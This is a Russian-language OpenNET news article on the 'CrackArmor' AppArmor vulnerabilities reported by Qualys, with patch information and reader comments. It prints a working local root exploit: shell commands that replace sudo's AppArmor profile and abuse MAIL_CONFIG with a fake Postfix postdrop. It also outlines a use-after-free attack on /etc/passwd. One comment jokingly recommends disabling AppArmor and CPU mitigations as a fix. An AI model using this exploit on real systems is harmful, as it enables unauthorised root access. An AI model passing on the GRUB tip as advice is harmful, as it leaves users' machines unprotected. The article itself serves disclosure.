The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимости в AppArmor, позволяющие получить root-доступ в системе

13.03.2026 12:56 (MSK)

Компания Qualys выявила 9 уязвимостей в системе мандатного управления доступом AppArmor, наиболее опасные из которых позволяют локальному непривилегированному пользователю получить права root в системе, выйти из изолированных контейнеров и обойти ограничения, заданные через AppArmor. Уязвимости получили кодовое имя CrackArmor. CVE-идентификаторы пока не назначены. Успешные примеры повышения привилегий продемонстрированы в Ubuntu 24.04 и Debian 13.

Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра Linux и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки.

Проблемы вызваны наличием в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns", например, для /usr/bin/time, позволяющего создавать неограниченные user namespace).

Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с настройками для почтового сервера Postfix.

Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты. 


   $ mkdir /tmp/postfix

   $ cat > /tmp/postfix/main.cf << "EOF"
   command_directory = /tmp/postfix
   EOF

   $ cat > /tmp/postfix/postdrop << "EOF"
   #!/bin/sh
   /usr/bin/id >> /tmp/postfix/pwned
   EOF

   $ chmod -R 0755 /tmp/postfix

   $ apparmor_parser -K -o sudo.pf << "EOF"
   /usr/bin/sudo {
     allow file,
     allow signal,
     allow network,
     allow capability,
     deny capability setuid,
   }
   EOF

  $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace
   Password: 

  $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever

   sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
   sudo: unable to open /etc/sudoers: Operation not permitted
   sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
   sudo: error initializing audit plugin sudoers_audit

   $ cat /tmp/postfix/pwned
   uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнением функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом из-за состояния гонки не исключено обращение к памяти, которую занимала структура, после её освобождения. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.

  1. Главная ссылка к новости (https://blog.qualys.com/vulner...)
  2. OpenNews: AppArmor и Yama будут включены в Linux-ядро 2.6.36
  3. OpenNews: Root-уязвимость в инструментарии управления пакетами Snap
  4. OpenNews: Уязвимости в PAM и libblockdev, позволяющие получить права root в системе
  5. OpenNews: Уязвимость в Glibc ld.so, позволяющая получить права root в большинстве дистрибутивов Linux
  6. OpenNews: Выявлена возможность обхода ограничений доступа к "user namespace" в Ubuntu
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/64984-apparmor
Ключевые слова: apparmor
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (8) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, IdeaFix (ok), 13:37, 13/03/2026 [ответить]  
    		• –3 +/
    раст бы не помог... как же так
     
     
  • 2.2, anonymmmeer (?), 13:41, 13/03/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    А ревью кода за 15 баксов за раз?
     
  • 2.3, kravich (ok), 13:43, 13/03/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Наглядный пример показывает, что Rust возбуждает гораздо сильнее, чем собственные разработки Canonical
     
  • 2.8, Аноним (8), 14:16, 13/03/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > раст бы не помог...

    получить права root
    двойным выполнением функции free()
    обращением к уже освобождённой области памяти
    из-за состояния гонки не исключено обращение к памяти, которую занимала структура, после её освобождения.

    Ну да, конечно не помог бы :)

     

  • 1.4, Аноним (4), 13:53, 13/03/2026 [ответить]  
    		• +/
    Фикс для бубунты:
    $ onano /etc/default/grub
    > GRUB_CMDLINE_LINUX_DEFAULT="quiet splash loglevel=0 apparmor=0 mitigations=off"

    $ update-grub

     
     
  • 2.5, openssh_user (ok), 14:13, 13/03/2026 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Нет apparmor - нет проблем?
     

  • 1.6, Аноним (6), 14:15, 13/03/2026 [ответить]  
    		• +/
    > ... других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux.

    Ниплоха, ниплоха!

    > Показано как получить права root при помощи уязвимостей, вызванных двойным выполнением функции free() и обращением к уже освобождённой области памяти (use‑after‑free)

    "если использовать язык программирования, с которым не надо тщательно обдумывать каждую строку, то можно знатно нафакапить" (c)

    Они использовали.
    И нафакапили.

     
  • 1.7, Аноним (7), 14:15, 13/03/2026 [ответить]  
    		• +/
    > Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11

    Не зря люди на 3.* ядре сидят.

     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2026 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру